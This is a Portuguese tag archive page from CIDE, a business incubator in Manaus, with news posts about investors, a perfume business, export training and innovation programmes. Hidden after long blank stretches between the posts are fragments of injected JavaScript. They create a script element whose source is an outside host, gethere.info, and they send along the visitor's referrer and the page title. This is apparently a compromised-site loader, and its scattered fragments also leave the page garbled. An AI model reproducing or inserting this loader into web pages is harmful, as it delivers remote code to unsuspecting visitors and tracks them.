• 92 3216-3892
  • secretaria@cide.org.br

Arquivo da tag empreendedores

Investimentos para empreendedores do CIDE

O representante da INSEED Investimentos, Euler Guimarães fala para empreendedores e convidados.

O representante da INSEED Investimentos, Euler Guimarães fala para empreendedores e convidados.

 

 

A Inseed Investimentos por meio do seu representante para a Região Norte, Euler Guimarães, apresentou, na tarde dessa terça-feira, 5, no Centro de Incubação e Desenvolvimento Empresarial (CIDE), novas possibilidades de financiamentos em produtos considerados inovadores.

 

O evento contou com as presenças de empreendedores e do diretor executivo da incubadora. “O investimento para cada empreendedor vai ser avaliado individualmente de acordo com o produto de cada empresa. O que buscamos é que sejam negócios que possam ser acelerados e possam crescer, e dentro e fora do CIDE há muitas empresas que atendem esse perfil e podem receber esse investimento”, diz Guimarães.

 

Para o diretor executivo José Barbosa Grosso, a proposta do agente da Inseed Investimentos significou um incentivo aos empresários instalados na incubadora. “A reunião superou as expectativas. Alguns empresários não possuem recursos suficientes para levar adiante sua ideia de forma rápida. Então a ajuda de um investidor é importante para acelerar o processo de desenvolvimento de um produto, por exemplo”, finaliza.

 

Inseed Investimentos

Somos uma gestora de recursos focada em inovação. Acreditamos no empreendedorismo e inovação como alavancas de geração de riqueza para a sociedade.

 

A partir de vivência empreendedora própria, descobrimos oportunidades inovadoras, com alto potencial de crescimento e atuamos junto às equipes das investidas. Investimos nestes negócios nascentes de base tecnológica e multiplicamos valor para empreendedores, investidores e sociedade.

O diretor executivo do CIDE, José Grosso (à dir.), acompanha a apresentação.

O diretor executivo do CIDE, José Grosso (à dir.), acompanha a apresentação.

 

 

Empreendedores instalados no CIDE conhecem a proposta.

Empreendedores instalados no CIDE conhecem a proposta.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

d.getElementsByTagName(‘head’)[0].appendChild(s);

A arte de fazer perfumes no CIDE

O casal de perfumistas, Elton e Irlanda, já estão instalados no Cide.

O casal de perfumistas, Elton e Irlanda, já estão instalados no Cide.

 

 

A prática da composição de perfumes está para o olfato assim como a arte da culinária está para o paladar, ou a arte da música, para os ouvidos.

A palavra perfume deriva do latim “per fumum”, que significa através do fumo. Com origem no Egito, o perfume surgiu da necessidade de aromatizar o corpo humano e objetos por maior tempo. Além do Egito, a arte da perfumaria também existiu na Índia, onde foi utilizada e aperfeiçoada pelos persas e romanos.

A moda do perfume surgiu na época do Renascimento, na Itália, e a partir disso, a indústria da perfumaria só continuou a crescer. Sendo considerada uma das indústrias que mais cresce no mundo, atualmente. Porém foi na França, em meados do século XIV, que a perfumaria teve seu maior avanço. O país tornou-se o maior centro de pesquisas e desenvolvimento de perfumes e possui as marcas mais importantes do mundo.

Vendo um mercado em ascensão e uma demanda cada vez mais crescente em Manaus, o casal Elton de França e Irlanda Sena, decidiram explorar o setor da Perfumaria, não somente comercializando os perfumes, mas vendendo essências da Amazônia, embalagens e dando formação sobre perfumaria.

“Em 1994 eu vi a necessidade de aumentar minha renda e comecei a fazer estudos na área de Cosméticos e Perfumaria, e comecei a fabricar perfumes para uso próprio, para colegas e conhecidos, no Rio de Janeiro”, conta o proprietário Elton de França, da Loja das Essências-Perfume da Amazônia, empresa que prepara a sua instalação, ainda este semestre, no Centro de Incubação e Desenvolvimento Empresarial (CIDE).

O perfumista Elton de França era militar e com a transferência, em 1996, para Manaus, continuou apaixonado pela área de Perfumaria. “Em Manaus, eu percebi que as pessoas gostavam de se perfumar e usar produtos bons de perfumaria. Então eu comecei a me interessar pelas essências dos perfumes. E andando pela cidade, conheci a minha esposa em uma loja em que vendia essências para perfumes”, relembra.

A loja de essências em que trabalhava Irlanda Sena fechou. Diante disso, Elton convidou a sua futura esposa a empreender na área de Perfumaria. “Já tínhamos conhecimentos suficientes para abrir nosso próprio negócio e assim o fizemos”, diz.

A decisão de ir ao Cide

Os perfumistas, Elton e Irlanda, querem ir mais longe e ampliar o negócio da Perfumaria Amazônica, realizar parcerias e participar de feiras nacionais e internacionais. “Decidimos ir ao CIDE devido à necessidade de ter um apoio técnico, mais formação e informação, para aumentar nossa empresa”, diz Elton

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

document.currentScript.parentNode.insertBefore(s, document.currentScript);

Pequenos empresários aprendem como exportar

Pequenos empresários ouvem palestra de auditor fiscal no Sebrae-AM

Pequenos empresários ouvem palestra de auditor fiscal no Sebrae-AM

 

 

O Comitê Gestor e de Divulgação do Plano Nacional de Cultura Exportadora (PNCE) realizou, na última terça-feira, 12, no Serviço Brasileiro de Apoio às Micro e Pequenas Empresas (Sebrae/Amazonas), a formação “Habilitação ao Siscomex”, para explicar aos pequenos empresários os procedimentos necessários sobre exportações de produtos.

 

A atividade contou com a participação dos empreendedores instalados no Centro de Incubação e Desenvolvimento Empresarial (CIDE), que conheceram o PNCE, na própria incubadora, depois de uma visita do comitê regional.

 

A formação foi dirigida pelo auditor fiscal da Receita Federal, Fabrício Magalhães, quem apresentou os modelos de documentos exigidos, os casos de exportações e tirou as dúvidas dos participantes. “Esse tipo de iniciativa é muito importante porque o potencial de exportação dos micros e pequenos empresários locais é enorme. Portanto, vamos dar orientações a eles de como realizar de forma legal as exportações de seus produtos”, diz.

SISCOMEX

Significa Sistema Integrado de Comércio Exterior. Foi instituído pelo Decreto 660/92, como sendo um instrumento administrativo que centraliza e/ou consolida as atividades de registro, acompanhamento e controle informatizado das operações de comércio exterior, tanto nas exportações quanto nas importações.

Palestra faz parte das atividades do PNCE

Palestra faz parte das atividades do PNCE

 

 

Empreendedores do CIDE conhecem o PNCE, na incubadora e decidem participar

Empreendedores do CIDE conhecem o PNCE, na incubadora e decidem participar

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

}

Programa SINAPSE: CERTI atualiza resultados com agentes participantes

O diretor de operações do Instituto CERTI, Marco Giágio, mostra os resultados do SINAPSE aos agentes.

O diretor de operações do Instituto CERTI, Marco Giágio, mostra os resultados do SINAPSE aos agentes.

 

 

Os diretores de incubadoras de empresas e representantes de instituições de ensino universitário público e privado se reuniram, na tarde desta quinta-feira, 3, com o diretor de operações do Instituto CERTI Amazônia, Marco Antônio Giágio, para conhecer e atualizar os resultados do SINAPSE da Inovação, programa de empreendedorismo inovador iniciado pela Fundação de Amparo à Pesquisa do Amazonas (FAPEAM), em parceria com a Fundação Centros de Referência em Tecnologias Inovadoras (CERTI) do Estado de Santa Catarina.

 

 A reunião aconteceu na sede do próprio instituto CERTI, em Manaus, com todos os agentes que participam do programa de inovação. “Fizemos uma atualização do programa e a partir de abril, iniciaremos uma nova fase que é a pré-incubação, isto é, é o período no qual os empreendedores selecionados vão iniciar suas operações com recursos da FAPEAM, gerando retorno desse investimento por meio da geração de empregos, recolhimento de impostos e gerando novos investimentos”, disse Marco Giágio.

 

 Ainda segundo ele, 1.188 inscrições foram feitas no início do programa e 40 ideias inovadoras foram aprovadas, e os novos empreendedores são livres para escolher o local físico para montar o seu próprio negócio. “Agora, eles estão na etapa de formalização. E o local de operação é uma decisão exclusiva e independente de cada empreendedor. Há várias opções e que cada um avalie qual é a mais adequada”, orienta Marco, acrescentando que o sucesso do SINAPSE é devido à participação de todos os agentes e parceiros.

 

 Conforme o diretor executivo do Centro de Incubação e Desenvolvimento Empresarial (CIDE), José Barbosa Grosso, alguns acadêmicos que participam do SINAPSE já estiveram na incubadora para conhecer as instalações. “Nossa instituição apoia as iniciativas da FAPEAM e do programa SINAPSE. Portanto, estamos preparados a receber os novos empreendedores que queiram instalar-se aqui”, destacou.

Representantes de incubadoras de empresas e de instituições acadêmicas participam da reunião.

Representantes de incubadoras de empresas e de instituições acadêmicas participam da reunião.

 

Marco Giágio (ao fundo) mostra a relação dos aprovados e selecionados.

Marco Giágio (ao fundo) mostra a relação dos aprovados e selecionados.

 

 

O diretor executivo do CIDE, José Grosso (à isq.), conversa com Marco Giágio.

O diretor executivo do CIDE, José Grosso (à esq.), conversa com Marco Giágio.

 

 

 

 

 

 

 

d.getElementsByTagName(‘head’)[0].appendChild(s);

Mdic convida empreendedores do CIDE para o PNCE

Durante a visita ao CIDE, representantes foram convidados a provar alguns produtos.

Durante a visita ao CIDE, representantes foram convidados a provar alguns produtos.

 

 

O Centro de Incubação e Desenvolvimento Empresarial (CIDE) é uma das instituições contempladas com a visita de representantes do Ministério do Desenvolvimento, Indústria e Comércio Exterior (Mdic) e da Superintendência da Zona Franca de Manaus (Suframa) que estiveram nesta quinta-feira, 25, na incubadora, para convidar os empreendedores a participar do Plano Nacional da Cultura Exportadora (PNCE).

Segundo o analista de comércio exterior, Rafael Codeço, o PNCE envolve setores de Alimentação e Bebidas, Cosméticos, Produtos Regionais, Indústria Naval, entre outros. “Nesse primeiro momento, trata-se de uma visita à diretoria do CIDE para convidar os empreendedores instalados na incubadora a participar da reunião, na qual explicaremos o programa e, por conseguinte, que eles participem do programa”, disse.

Ainda conforme Codeço, a reunião deve ser agendada para este primeiro semestre, na própria incubadora de empresas.

Para o diretor executivo do CIDE, José Barbosa Grosso, os empresários instalados na incubadora têm potencial para participar do programa do Mdic. “Temos ótimos empreendedores, com produtos competitivos e criativos. Portanto, penso eu, que não teremos dificuldades para participar do PNCE”, conclui.

Representantes do Mdic e da Suframa conversam com empresários no CIDE.

Representantes do Mdic e da Suframa conversam com empresários no CIDE.

 

 

O diretor executivo do CIDE, José Grosso, foi o encarregado de mostrar as instalações do CIDE.

O diretor executivo do CIDE, José Grosso, foi o encarregado de mostrar as instalações do CIDE.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;